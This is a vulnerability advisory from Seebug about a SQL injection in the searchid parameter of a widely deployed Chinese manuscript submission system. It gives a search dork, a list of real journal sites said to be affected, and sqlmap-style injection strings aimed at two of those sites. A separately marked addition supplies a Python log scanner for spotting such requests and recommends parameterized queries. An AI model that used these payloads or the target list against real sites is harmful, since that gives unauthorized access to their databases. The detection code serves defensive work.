A generic SQL injection in a widely used manuscript submission system

2015-06-01T00:00:00
ID SSV:95734
Type seebug
Reporter Root
Modified 2015-06-01T00:00:00

Description

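Brief description:

Affects a very large number of manuscript submission systems.

Detailed explanation:

Google keyword: 技术支持:南京杰诺瀚软件科技有限公司 ("Technical support: 南京杰诺瀚软件科技有限公司")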

Cases:
http://www.cjge-manuscriptcentral.com/Web/News.aspx?searchid=163768
http://www.lcmzxzz.com/Web/News.aspx?searchid=586073
http://gaojian.xhnj.com/Web/News.aspx?searchid=313670
http://xb.cuit.edu.cn/Web/News.aspx?searchid=112266
http://dxjykx.cnmanu.cn/Web/News.aspx?searchid=107094
http://www.jsnyxb.com/Web/News.aspx?searchid=1
http://www.lcsjwk.com/Web/News.aspx?searchid=1
http://j.chinatransducers.com/Web/News.aspx?searchid=1
http://www.linpi.net/Web/News.aspx?searchid=1
http://www.mfskin.net/Web/News.aspx?searchid=1
http://www.gjmzyfs.com/Web/News.aspx?searchid=1
http://ctc.hlglzz.com/Web/News.aspx?searchid=328935
http://www.lcjsyx.com/Web/News.aspx?searchid=84777
http://www.apsjournal.com/web/News.aspx?searchid=111061

Proof of vulnerability:

http://www.lcsjwk.com/Web/News.aspx?searchid=1%27,1,1,1,1,1,1,1,1,1,1,1,1*" --dbms mssql --level 1 --risk 3 --technique=T --users -v 3 --batch

http://www.cjge-manuscriptcentral.com/Web/News.aspx?searchid=163768%27,1,1,1,1,1,1,1,1,1,1,1,1*" --dbms mssql --level 1 --risk 3 --technique=T --users -v 3 --batch
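
A defensive check based on the requests shown above, added here as an example and not part of the original report: it scans web access logs for requests to `/Web/News.aspx` whose `searchid` value is not a plain integer. The log format, the sample lines and the function name are assumptions, as is the premise that legitimate `searchid` values are always numeric (every case URL on the page uses one).

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined-log style, not from the page).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jun/2015:16:10:10 +0800] "GET /Web/News.aspx?searchid=163768 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jun/2015:16:10:12 +0800] "GET /Web/News.aspx?searchid=1%27,1,1,1,1,1,1,1,1,1,1,1,1 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jun/2015:16:10:40 +0800] "GET /web/News.aspx?SearchID=84777%27 HTTP/1.1" 500 312
203.0.113.7 - - [01/Jun/2015:16:11:02 +0800] "GET /Web/Index.aspx?id=7 HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TARGET_PATH = "/web/news.aspx"   # IIS paths are case-insensitive, so compare lowercased
TARGET_PARAM = "searchid"        # ASP.NET query-string keys are case-insensitive too


def suspicious_searchid_requests(log_text):
    """Return (line_no, decoded_value) for News.aspx hits whose searchid is not all digits."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if url.path.lower() != TARGET_PATH:
            continue
        # parse_qs percent-decodes values, so %27 is seen as a single quote.
        params = parse_qs(url.query, keep_blank_values=True)
        for name, values in params.items():
            if name.lower() != TARGET_PARAM:
                continue
            for value in values:
                if not re.fullmatch(r"[0-9]+", value):
                    findings.append((line_no, value))
    return findings


if __name__ == "__main__":
    for line_no, value in suspicious_searchid_requests(SAMPLE_LOG):
        print(f"line {line_no}: non-numeric searchid {value!r}")
```

The same integer-only rule can be enforced at the application or WAF layer; the durable fix is for the page to bind `searchid` as a typed query parameter instead of concatenating it into the SQL statement.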